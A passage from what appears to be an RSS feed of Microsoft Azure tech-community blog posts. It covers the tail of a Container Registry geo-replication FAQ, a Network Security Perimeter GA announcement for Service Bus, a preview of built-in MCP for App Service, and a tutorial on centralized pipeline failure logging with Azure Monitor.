&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Question&lt;/th&gt;&lt;th&gt;Answer&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;When should I use regional endpoints vs the global endpoint?&lt;/td&gt;&lt;td&gt;Use regional endpoints (Step 2a) for workloads that need affinity, predictable routing, push/pull consistency, troubleshooting, or client-side failover. Use the global endpoint (Step 2b) for everything else and let health-aware failover handle routing.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;What should I enable for secure, resilient layer downloads?&lt;/td&gt;&lt;td&gt;Enable &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-dedicated-data-endpoints" target="_blank" rel="noopener"&gt;dedicated data endpoints&lt;/A&gt;. They scope firewall rules tightly to your registry and replace wildcard storage DNS with predictable per-region FQDNs.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;How do I avoid DNS-bouncing manifest validation failures on push?&lt;/td&gt;&lt;td&gt;Pin pushes to a single replica via a regional endpoint. A short-lived client-side &lt;CODE&gt;dnsmasq&lt;/CODE&gt; for the push duration is also fine if you're not using regional endpoints.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Should I run a long-lived DNS cache for the global endpoint?&lt;/td&gt;&lt;td&gt;No. ACR purges DNS server-side on disable and during failover; client-side caching works against that.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Do I need to re-auth when switching endpoints?&lt;/td&gt;&lt;td&gt;Yes. Each global or regional endpoint is its own authenticated surface. 
&lt;CODE&gt;az acr login&lt;/CODE&gt;, SDK auth, or the Kubernetes ACR credential provider handles the re-auth.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;What happens during a home region outage?&lt;/td&gt;&lt;td&gt;Data plane keeps working through any replica via the global endpoint or regional endpoints. Control plane operations (replica configuration, network rules) are unavailable until the home region recovers. The home region is fixed at registry creation.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;What's ACR doing about eventual-consistency pain?&lt;/td&gt;&lt;td&gt;Bounded staleness consistency for cross-replica pushed images is in development and will be covered in an upcoming blog post. Reach out via GitHub if you want to share your scenario.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;For the full automation matrix — what's automatic, what requires customer action, and what to expect for each scenario — see the behavior summary above.&lt;/P&gt;
&lt;P&gt;If you have further questions about ACR geo-replication routing, pinning, capacity planning, eventual consistency, or failover behavior, reach out to us on the &lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure Container Registry GitHub repository&lt;/A&gt; or file feedback through the Azure portal.&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 18:07:21 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/designing-for-high-availability-the-operational-reference-for/ba-p/4526465</guid>
      <dc:creator>johnsonshi_msft</dc:creator>
      <dc:date>2026-06-08T18:07:21Z</dc:date>
    </item>
    <item>
      <title>GA of NSP for Azure Service Bus &amp; NSP now available in Azure Gov. Regions</title>
      <link>https://techcommunity.microsoft.com/t5/azure-networking-blog/ga-of-nsp-for-azure-service-bus-nsp-now-available-in-azure-gov/ba-p/4526413</link>
      <description>&lt;H3&gt;TL;DR&lt;/H3&gt;
&lt;P&gt;Network Security Perimeter (NSP) support for Azure Service Bus is now &lt;STRONG&gt;Generally Available&lt;/STRONG&gt;. With this, you can now place your Service Bus namespace inside a central security boundary and apply perimeter-based governance for inbound/outbound network access—while keeping key PaaS-to-PaaS scenarios secure and auditable.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;Introduction&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;We’re excited to announce that &lt;STRONG&gt;Network Security Perimeter (NSP) support for Azure Service Bus is now Generally Available (GA)&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P&gt;This milestone brings one of Azure’s most widely used messaging services into the NSP ecosystem, enabling customers to define a centralized security boundary across messaging and data services.&lt;/P&gt;
&lt;P&gt;Alongside this, we are also expanding NSP’s reach — NSP is now available in Azure Government regions, including:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Texas&lt;/LI&gt;
&lt;LI&gt;Arizona&lt;/LI&gt;
&lt;LI&gt;Virginia&lt;/LI&gt;
&lt;LI&gt;DoD East&lt;/LI&gt;
&lt;LI&gt;DoD Central&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This ensures that customers operating in regulated, sovereign, and mission-critical environments can adopt NSP while meeting their compliance and regional requirements.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;Why this matters&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Modern applications rely heavily on messaging layers like Service Bus. These systems often connect microservices, data platforms, key management systems, and external integrations. As architectures scale, managing network access individually becomes complex and error-prone.&lt;/P&gt;
&lt;P&gt;NSP changes this by introducing a perimeter-based access model, where:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Communication is restricted by default&lt;/LI&gt;
&lt;LI&gt;Access must be explicitly allowed&lt;/LI&gt;
&lt;LI&gt;Governance is applied consistently across services&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;With Service Bus now onboarded and NSP extending into Azure Gov regions, customers can apply this model across both commercial and sovereign environments.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;What you can do with Service Bus + NSP&lt;/STRONG&gt;&lt;/H1&gt;
&lt;H2&gt;Confine communication within a security boundary&lt;/H2&gt;
&lt;P&gt;Service Bus namespaces communicate only with resources inside the perimeter by default—blocking unintended access.&lt;/P&gt;
&lt;H2&gt;Secure PaaS-to-PaaS communication&lt;/H2&gt;
&lt;P&gt;Enable secure interactions between Service Bus, Azure Key Vault (for CMK scenarios) and other NSP-enabled services (&lt;A href="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-concepts#onboarded-private-link-resources" target="_blank"&gt;What is a network security perimeter? - Azure Private Link | Microsoft Learn&lt;/A&gt;)&lt;/P&gt;
&lt;H2&gt;Define explicit access controls&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Inbound rules → IP ranges and subscriptions&lt;/LI&gt;
&lt;LI&gt;Outbound rules → FQDN-based filtering&lt;/LI&gt;
&lt;/UL&gt;
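&lt;P&gt;As a rough mental model of "restricted by default, explicitly allowed", the Python sketch below checks a source IP against a list of allowed CIDR ranges and denies everything else. The ranges and the &lt;CODE&gt;is_inbound_allowed&lt;/CODE&gt; helper are hypothetical. This is not how NSP evaluates rules internally, only an illustration of the default-deny idea behind inbound IP rules.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import ipaddress

# Hypothetical inbound allow list (documentation-only address ranges).
ALLOWED_RANGES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("198.51.100.16/28"),
]

def is_inbound_allowed(source_ip, allowed_ranges=ALLOWED_RANGES):
    """Default deny: allow only if the address falls inside an allowed range."""
    address = ipaddress.ip_address(source_ip)
    return any(address in network for network in allowed_ranges)

print(is_inbound_allowed("203.0.113.42"))  # inside the first range
print(is_inbound_allowed("192.0.2.10"))    # not listed, so denied&lt;/LI-CODE&gt;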
&lt;H2&gt;Enable audit and compliance visibility&lt;/H2&gt;
&lt;P&gt;Diagnostic logs capture all access attempts, supporting compliance and investigation workflows.&lt;/P&gt;
&lt;H2&gt;Use Private Link seamlessly&lt;/H2&gt;
&lt;P&gt;Private endpoint traffic continues to work without additional configuration inside the perimeter.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;Azure Government Availability&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;With this update, NSP is now available in key &lt;STRONG&gt;Azure Government regions (Texas, Arizona, Virginia, DoD East, and DoD Central)&lt;/STRONG&gt;, enabling:&lt;/P&gt;
&lt;H2&gt;Consistent security across clouds&lt;/H2&gt;
&lt;P&gt;Apply the same NSP model across public Azure regions and Azure Government environments.&lt;/P&gt;
&lt;H2&gt;Support for regulated workloads&lt;/H2&gt;
&lt;P&gt;Customers in federal, defence, and highly regulated industries can now:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Enforce perimeter-based governance&lt;/LI&gt;
&lt;LI&gt;Reduce exposure risks&lt;/LI&gt;
&lt;LI&gt;Meet compliance requirements&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Enable secure cross-service patterns in Gov clouds&lt;/H2&gt;
&lt;P&gt;Azure Government boundaries now support scenarios like:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;CMK with Key Vault&lt;/LI&gt;
&lt;LI&gt;Service-to-service messaging&lt;/LI&gt;
&lt;LI&gt;Controlled external access&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;The full list of onboarded PaaS services is available in &lt;A href="https://learn.microsoft.com/en-us/azure/private-link/network-security-perimeter-concepts#onboarded-private-link-resources" target="_blank"&gt;What is a network security perimeter? - Azure Private Link | Microsoft Learn&lt;/A&gt;.&lt;/P&gt;
&lt;H1&gt;&lt;STRONG&gt;What’s next&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Service Bus GA further strengthens NSP’s growing coverage across Azure PaaS services. We will continue to:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Expand PaaS service onboarding&lt;/LI&gt;
&lt;LI&gt;Improve access rule capabilities (e.g. Service tag-based access, identity-based access)&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Mon, 08 Jun 2026 14:01:28 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-networking-blog/ga-of-nsp-for-azure-service-bus-nsp-now-available-in-azure-gov/ba-p/4526413</guid>
      <dc:creator>shashankamalladi</dc:creator>
      <dc:date>2026-06-08T14:01:28Z</dc:date>
    </item>
    <item>
      <title>Now in preview: built-in MCP for Azure App Service</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/now-in-preview-built-in-mcp-for-azure-app-service/ba-p/4526407</link>
      <description>&lt;P&gt;At Build 2026 last week, we announced the public preview of &lt;STRONG&gt;built-in MCP for Azure App Service&lt;/STRONG&gt;. It does one thing, and it does it with almost no effort on your part: it turns a REST API you already host on App Service into a &lt;A class="lia-external-url" href="https://modelcontextprotocol.io/introduction" target="_blank"&gt;Model Context Protocol (MCP)&lt;/A&gt; server, so AI agents and assistants can call your API as a set of tools. No MCP code to write. No second service to deploy.&lt;/P&gt;
&lt;H3&gt;What it does&lt;/H3&gt;
&lt;P&gt;You give App Service an OpenAPI 3.x specification (JSON or YAML) describing the operations you want to expose. The platform reads that spec and generates one MCP tool per operation, then serves the MCP endpoint over streamable HTTP at a path you choose (the default is &lt;STRONG&gt;/mcp&lt;/STRONG&gt;). From there, App Service handles the parts that are tedious to build yourself:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;MCP protocol negotiation&lt;/LI&gt;
&lt;LI&gt;Tool discovery, so clients can list the operations your spec exposes&lt;/LI&gt;
&lt;LI&gt;Hot reload of the spec when it changes&lt;/LI&gt;
&lt;LI&gt;Client cancellation&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Any MCP-compatible client can connect, including GitHub Copilot Chat, Cursor, Windsurf, and Claude Desktop.&lt;/P&gt;
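&lt;P&gt;To make the "one MCP tool per operation" idea concrete, here is a minimal Python sketch that walks an OpenAPI 3.x document and lists one entry per operation. It only illustrates the mapping. The sample spec, the &lt;CODE&gt;list_operations&lt;/CODE&gt; helper, and the use of &lt;CODE&gt;operationId&lt;/CODE&gt; as the name are assumptions for illustration, not a description of how App Service names or generates tools.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# Illustrative sketch only: enumerate the operations in an OpenAPI 3.x document.
# The sample spec and the list_operations helper are hypothetical.

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options", "trace"}

def list_operations(spec):
    """Return one (name, method, path) tuple per operation in the spec."""
    operations = []
    for path, path_item in spec.get("paths", {}).items():
        for method, operation in path_item.items():
            if method.lower() not in HTTP_METHODS:
                continue  # skip non-operation keys such as "parameters"
            # Assumption: fall back to "method path" when operationId is missing.
            name = operation.get("operationId") or f"{method.lower()} {path}"
            operations.append((name, method.upper(), path))
    return operations

sample_spec = {
    "openapi": "3.0.3",
    "paths": {
        "/todos": {
            "get": {"operationId": "listTodos"},
            "post": {"operationId": "createTodo"},
        },
        "/todos/{id}": {
            "parameters": [{"name": "id", "in": "path", "required": True}],
            "delete": {"operationId": "deleteTodo"},
        },
    },
}

for name, method, path in list_operations(sample_spec):
    print(f"{name}: {method} {path}")&lt;/LI-CODE&gt;
&lt;P&gt;Each printed line corresponds to one operation an agent could call as a tool. Anything that does not fit this one-operation shape is a candidate for a custom MCP server instead.&lt;/P&gt;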
&lt;H3&gt;Why it matters&lt;/H3&gt;
&lt;P&gt;Most teams already have the API the agent ecosystem wants to call. What they don't have is the time to wrap it in a bespoke MCP server, keep that server in sync with the API, and operate it. Built-in MCP removes that work entirely. If your REST API runs on App Service and you can produce an OpenAPI spec for it — and most web frameworks generate one for you — you're a configuration change away from an agent-ready endpoint.&lt;/P&gt;
&lt;H3&gt;Built-in or custom?&lt;/H3&gt;
&lt;P&gt;Built-in MCP is the fastest path when your tools map cleanly to REST operations. If you need behavior that doesn't — multi-step workflows, in-memory aggregation, MCP resources or prompts, or more than one MCP server on a single app — a custom MCP server built with an MCP SDK and deployed as your application code is still the right choice. The two approaches complement each other, and you can read more about choosing between them in the docs.&lt;/P&gt;
&lt;H3&gt;Security&lt;/H3&gt;
&lt;P&gt;Built-in MCP works with &lt;STRONG&gt;App Service Authentication&lt;/STRONG&gt;, so MCP requests go through the same identity checks as every other route on your app, using Microsoft Entra or any OpenID Connect provider you've configured. When App Service Authentication is enabled, the platform also publishes OAuth protected-resource metadata so MCP clients can complete the OAuth flow automatically. As always, your application code is responsible for validating the bearer token on each request — and you should avoid exposing an MCP server publicly without authentication, since every published tool becomes callable once a client connects.&lt;/P&gt;
&lt;H3&gt;Getting started&lt;/H3&gt;
&lt;P&gt;Built-in MCP is configured through the &lt;STRONG&gt;aiIntegration&lt;/STRONG&gt; property on your App Service app, and the preview supports three configuration paths: the Azure portal, the Azure CLI (&lt;STRONG&gt;az rest&lt;/STRONG&gt;), and Bicep. It runs on dedicated pricing tiers, Basic or higher — it isn't supported on Free, Shared, Consumption, or Flex Consumption plans.&lt;/P&gt;
&lt;P&gt;This is a preview, and we'd love your feedback as you try it. To enable built-in MCP on your own app and connect an MCP client, head to the docs:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/app-service/configure-mcp-built-in" target="_blank"&gt;Configure App Service built-in MCP (preview)&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/app-service/scenario-ai-model-context-protocol-server" target="_blank"&gt;Use App Service as a Model Context Protocol (MCP) server&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Mon, 08 Jun 2026 13:09:52 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/now-in-preview-built-in-mcp-for-azure-app-service/ba-p/4526407</guid>
      <dc:creator>jordanselig</dc:creator>
      <dc:date>2026-06-08T13:09:52Z</dc:date>
    </item>
    <item>
      <title>Designing Reliable Data Platforms: Centralized Failure Logging Framework with Azure Monitor</title>
      <link>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/designing-reliable-data-platforms-centralized-failure-logging/ba-p/4505832</link>
      <description>&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;&lt;STRONG&gt;Introduction&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P data-start="150" data-end="346"&gt;Modern data platforms are no longer just about moving and transforming data. In production, what really matters is reliability and how quickly you can understand and react when something breaks.&lt;/P&gt;
&lt;P data-start="348" data-end="544"&gt;If you’re using Azure Synapse, ADF, or Microsoft Fabric, you already have built-in monitoring: you can see pipeline runs and error messages.&lt;/P&gt;
&lt;P data-start="348" data-end="544"&gt;But it doesn’t show you activity-level errors. Pipeline-level monitoring works well when you’re debugging a single failure.&lt;/P&gt;
&lt;P data-start="546" data-end="567"&gt;But it doesn’t scale.&lt;/P&gt;
&lt;P data-start="569" data-end="802"&gt;Once you have dozens of pipelines running across multiple environments, failures become harder to track. You find yourself jumping between pipeline runs, scanning activity outputs, and trying to piece together what actually happened.&lt;/P&gt;
&lt;P data-start="804" data-end="862"&gt;And suddenly, simple questions become difficult to answer:&lt;/P&gt;
&lt;UL data-start="864" data-end="1062"&gt;
&lt;LI data-section-id="qyza8c" data-start="864" data-end="906"&gt;Which datasets are failing most often?&lt;/LI&gt;
&lt;LI data-section-id="1u6zs9" data-start="907" data-end="964"&gt;Are failures concentrated in Bronze, Silver, or Gold?&lt;/LI&gt;
&lt;LI data-section-id="1606yxs" data-start="965" data-end="1016"&gt;Is this a one-off issue or a recurring pattern?&lt;/LI&gt;
&lt;LI data-section-id="p38ort" data-start="1017" data-end="1062"&gt;What changed between yesterday and today?&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="1064" data-end="1161"&gt;At that point, pipeline-level monitoring is no longer enough. You need something more structured.&lt;/P&gt;
&lt;P data-start="1064" data-end="1161"&gt;P.S. The framework can be implemented in both &lt;STRONG&gt;Synapse and Microsoft Fabric&lt;/STRONG&gt; environments with minimal changes.&lt;/P&gt;
&lt;H1 data-section-id="cer2gy" data-start="1111" data-end="1153"&gt;&lt;SPAN class="lia-text-color-21"&gt;&lt;STRONG&gt;Why we need a custom logging framework&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P data-start="1212" data-end="1296"&gt;The core issue is that pipeline failures are treated as &lt;STRONG&gt;runtime events, not as data&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-start="1298" data-end="1527"&gt;They live inside pipeline output and are tied to a specific run. This makes them hard to query across time, aggregate across pipelines, correlate across environments, trace to the specific activity that failed, or integrate into alerting and dashboards in a consistent way.&lt;/P&gt;
&lt;P data-start="1529" data-end="1584"&gt;Pipeline failures are visible, but activity failures are not, and neither is operationalized. What’s missing is a central place where all failures, including activity-level logs, are captured in a consistent, structured format, regardless of which pipeline or dataset produced them.&lt;/P&gt;
&lt;P data-start="1744" data-end="1793"&gt;That’s where a custom logging framework comes in. Instead of relying only on built-in monitoring, we introduce a layer that captures failures as structured events, standardizes the payload across pipelines, and sends it to Log Analytics, where it can be queried using KQL.&lt;/P&gt;
&lt;P data-start="2018" data-end="2169"&gt;This shifts the model from checking a pipeline when it fails to treating failures as a dataset that can be analyzed, monitored, and improved over time.&lt;/P&gt;
&lt;P data-start="2171" data-end="2428"&gt;Once you make that shift, you can build alerts based on patterns instead of reacting to single failures, track reliability across datasets or domains, and identify recurring issues instead of dealing with incidents one by one.&lt;/P&gt;
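&lt;P&gt;As a sketch of what alerting on patterns can look like once failures are structured records, the Python below counts failures per dataset and layer and flags the combinations that reach a threshold. The sample records, the threshold, and the &lt;CODE&gt;recurring_failures&lt;/CODE&gt; helper are assumptions for illustration. In the framework itself, this kind of aggregation would more naturally run as a KQL query over the Log Analytics table.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from collections import Counter

def recurring_failures(records, threshold=3):
    """Return (DatasetName, Layer) pairs that failed at least `threshold` times."""
    counts = Counter((r["DatasetName"], r["Layer"]) for r in records)
    return {key: n for key, n in counts.items() if n >= threshold}

# Hypothetical failure events; DatasetName and Layer are fields of the logging schema.
sample = [
    {"DatasetName": "orders", "Layer": "Bronze"},
    {"DatasetName": "orders", "Layer": "Bronze"},
    {"DatasetName": "orders", "Layer": "Bronze"},
    {"DatasetName": "customers", "Layer": "Silver"},
]

print(recurring_failures(sample))&lt;/LI-CODE&gt;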
&lt;P data-start="2430" data-end="2613"&gt;It also changes who can use the data. Visibility is no longer limited to engineers digging into pipeline runs; it becomes accessible at the platform level for leads and stakeholders.&lt;/P&gt;
&lt;P data-start="2615" data-end="2730" data-is-last-node="" data-is-only-node=""&gt;This framework &lt;STRONG&gt;doesn’t replace Synapse&lt;/STRONG&gt; monitoring. It complements it by &lt;STRONG&gt;adding a proper observability layer on top.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P data-start="2615" data-end="2730" data-is-last-node="" data-is-only-node=""&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="2615" data-end="2730"&gt;&lt;SPAN class="lia-text-color-21"&gt;&lt;STRONG&gt;Architecture&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H1&gt;
&lt;img /&gt;
&lt;P data-start="525" data-end="771"&gt;When a pipeline fails in Synapse, the failure is intercepted through a dedicated failure path. At this stage, we don’t just log the error as-is; we pass it through a custom logging framework that transforms the failure into a structured payload.&lt;/P&gt;
&lt;P data-start="773" data-end="1037"&gt;This payload includes key context such as pipeline name, activity, environment, dataset, layer (Bronze/Silver/Gold), error details, and correlation identifiers.&lt;/P&gt;
&lt;P data-start="773" data-end="1037"&gt;The important part here is &lt;STRONG&gt;consistency: every pipeline emits the same schema, regardless of its logic&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-start="1039" data-end="1261"&gt;Once the payload is constructed, it is sent to Azure Monitor using the Logs Ingestion API. This API acts as the entry point into the monitoring system and decouples the pipelines from the underlying storage implementation.&lt;/P&gt;
&lt;P data-start="1263" data-end="1479"&gt;A Data Collection Rule (&lt;STRONG&gt;DCR&lt;/STRONG&gt;) sits behind the ingestion layer and defines how incoming data is handled. It acts as a contract for the payload schema and optionally applies transformations before the data is persisted.&lt;/P&gt;
&lt;P data-start="1481" data-end="1757"&gt;Finally, the logs are stored in a custom Log Analytics table, where they become fully queryable using KQL. At this point, failures are no longer tied to a single pipeline run; they are part of a centralized dataset that can be analyzed across time, environments, and domains.&lt;/P&gt;
&lt;P data-start="1481" data-end="1757"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Setting up Log Analytics&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P data-start="167" data-end="421"&gt;Before integrating the logging framework with Synapse, we first need to set up the destination for our logs. This includes creating a Log Analytics workspace, defining a custom table, and configuring the ingestion path using a Data Collection Rule (DCR).&lt;/P&gt;
&lt;P data-start="423" data-end="550"&gt;The goal is to create a pipeline where structured failure events can be received, validated, and stored in a consistent format.&lt;/P&gt;
&lt;P data-start="423" data-end="550"&gt;P.S. All steps mentioned in this blog can be automated with ARM templates.&lt;/P&gt;
&lt;H2 data-section-id="yczjjc" data-start="557" data-end="595"&gt;1. Create a Log Analytics workspace&lt;/H2&gt;
&lt;P data-start="597" data-end="724"&gt;Start by creating a Log Analytics workspace. This will act as the central store for all failure logs across your data platform.&lt;/P&gt;
&lt;P data-start="726" data-end="746"&gt;In the Azure Portal:&lt;/P&gt;
&lt;UL data-start="747" data-end="947"&gt;
&lt;LI data-section-id="141ofnb" data-start="747" data-end="805"&gt;Navigate to &lt;STRONG data-start="761" data-end="805"&gt;Azure Monitor → Log Analytics workspaces&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="a5azgj" data-start="806" data-end="871"&gt;Create a new workspace in your target subscription and region&lt;/LI&gt;
&lt;LI data-section-id="18hvm0o" data-start="872" data-end="947"&gt;Choose a meaningful name (for example: log-analytics-data-domain)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="949" data-end="1047"&gt;This workspace becomes the single place where all pipeline failures will be collected and queried.&lt;/P&gt;
&lt;H2 data-section-id="1euc41n" data-start="1054" data-end="1103"&gt;2. Create a custom table for pipeline failures&lt;/H2&gt;
&lt;P data-start="1105" data-end="1211"&gt;Instead of relying on generic tables, we define a dedicated custom table to store pipeline failure events.&lt;/P&gt;
&lt;P data-start="1213" data-end="1246"&gt;From the Log Analytics workspace:&lt;/P&gt;
&lt;UL data-start="1247" data-end="1380"&gt;
&lt;LI data-section-id="1y008k7" data-start="1247" data-end="1303"&gt;Go to &lt;STRONG data-start="1255" data-end="1301"&gt;Tables → Create → Custom table (DCR-based)&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="1yzdl3v" data-start="1304" data-end="1380"&gt;Define a table name such as:&lt;BR data-start="1334" data-end="1337" /&gt;DataDomain_SynapsePipelineErrors_CL (the name must end with the _CL suffix)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="1382" data-end="1483"&gt;At this stage, you’ll define the schema that represents your logging payload. Typical fields include:&lt;/P&gt;
&lt;UL data-start="1485" data-end="1722"&gt;
&lt;LI data-section-id="1ktjymq" data-start="1485" data-end="1502"&gt;TimeGenerated&lt;/LI&gt;
&lt;LI data-section-id="1i7p68d" data-start="1503" data-end="1519"&gt;PipelineName&lt;/LI&gt;
&lt;LI data-section-id="69qyum" data-start="1520" data-end="1537"&gt;PipelineRunId&lt;/LI&gt;
&lt;LI data-section-id="1p8fzoi" data-start="1538" data-end="1554"&gt;ActivityName&lt;/LI&gt;
&lt;LI data-section-id="1vhcezh" data-start="1555" data-end="1571"&gt;ActivityType&lt;/LI&gt;
&lt;LI data-section-id="13r11a4" data-start="1572" data-end="1582"&gt;Status&lt;/LI&gt;
&lt;LI data-section-id="1msukwt" data-start="1583" data-end="1596"&gt;ErrorCode&lt;/LI&gt;
&lt;LI data-section-id="vp7gsb" data-start="1597" data-end="1613"&gt;ErrorMessage&lt;/LI&gt;
&lt;LI data-section-id="5v6lvf" data-start="1614" data-end="1626"&gt;Severity&lt;/LI&gt;
&lt;LI data-section-id="67fknx" data-start="1627" data-end="1642"&gt;Environment&lt;/LI&gt;
&lt;LI data-section-id="xln5t7" data-start="1643" data-end="1652"&gt;Layer&lt;/LI&gt;
&lt;LI data-section-id="1vk9v6l" data-start="1653" data-end="1668"&gt;DatasetName&lt;/LI&gt;
&lt;LI data-section-id="uw7uou" data-start="1669" data-end="1686"&gt;PartitionDate&lt;/LI&gt;
&lt;LI data-section-id="1c3rxoq" data-start="1687" data-end="1704"&gt;WorkspaceName&lt;/LI&gt;
&lt;LI data-section-id="169xo71" data-start="1705" data-end="1722"&gt;CorrelationId&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="1724" data-end="1841"&gt;The key here is consistency. This schema will be reused across all pipelines, so take the time to define it properly.&lt;/P&gt;
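&lt;P&gt;One way to keep that schema honest is to check each event against the agreed field list before it is sent. The Python sketch below does that with the fields listed above. The &lt;CODE&gt;missing_fields&lt;/CODE&gt; helper and the sample event are hypothetical, and in practice the enforcement would more likely live in the DCR than in a script.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# Field names copied from the schema list above.
REQUIRED_FIELDS = (
    "TimeGenerated", "PipelineName", "PipelineRunId", "ActivityName",
    "ActivityType", "Status", "ErrorCode", "ErrorMessage", "Severity",
    "Environment", "Layer", "DatasetName", "PartitionDate",
    "WorkspaceName", "CorrelationId",
)

def missing_fields(event):
    """Return the required fields that are absent from a failure event."""
    return [name for name in REQUIRED_FIELDS if name not in event]

# Hypothetical, deliberately incomplete event.
event = {"TimeGenerated": "2026-06-08T10:00:00Z", "PipelineName": "pl_ingest_orders"}
print(missing_fields(event))&lt;/LI-CODE&gt;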
&lt;H2 data-section-id="um9dlt" data-start="1848" data-end="1889"&gt;3. Create a Data Collection Rule (DCR)&lt;/H2&gt;
&lt;P data-start="1891" data-end="2040"&gt;The Data Collection Rule defines how incoming data is ingested into Log Analytics. It acts as both a &lt;STRONG data-start="1992" data-end="2011"&gt;schema contract&lt;/STRONG&gt; and a &lt;STRONG data-start="2018" data-end="2039"&gt;routing mechanism&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-start="2042" data-end="2058"&gt;In Azure Portal:&lt;/P&gt;
&lt;UL data-start="2059" data-end="2180"&gt;
&lt;LI data-section-id="1vxlkzr" data-start="2059" data-end="2108"&gt;Go to &lt;STRONG data-start="2067" data-end="2108"&gt;Azure Monitor → Data Collection Rules&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="9a1wki" data-start="2109" data-end="2180"&gt;Create a new DCR and associate it with your Log Analytics workspace&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="2182" data-end="2197"&gt;Within the DCR:&lt;/P&gt;
&lt;UL data-start="2198" data-end="2427"&gt;
&lt;LI data-section-id="1g3t3v8" data-start="2198" data-end="2290"&gt;Define a &lt;STRONG data-start="2209" data-end="2226"&gt;custom stream&lt;/STRONG&gt; (for example: Custom-DataDomain_SynapsePipelineErrors_CL; custom stream names in a DCR begin with Custom-)&lt;/LI&gt;
&lt;LI data-section-id="1kdln6x" data-start="2291" data-end="2331"&gt;Map this stream to your custom table&lt;/LI&gt;
&lt;LI data-section-id="167f0nv" data-start="2332" data-end="2427"&gt;Optionally define transformations using KQL (for example, renaming fields or enforcing types)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="2429" data-end="2595"&gt;This step is critical because it decouples your pipelines from the storage layer. If the schema evolves later, you can adjust it here without changing pipeline logic.&lt;/P&gt;
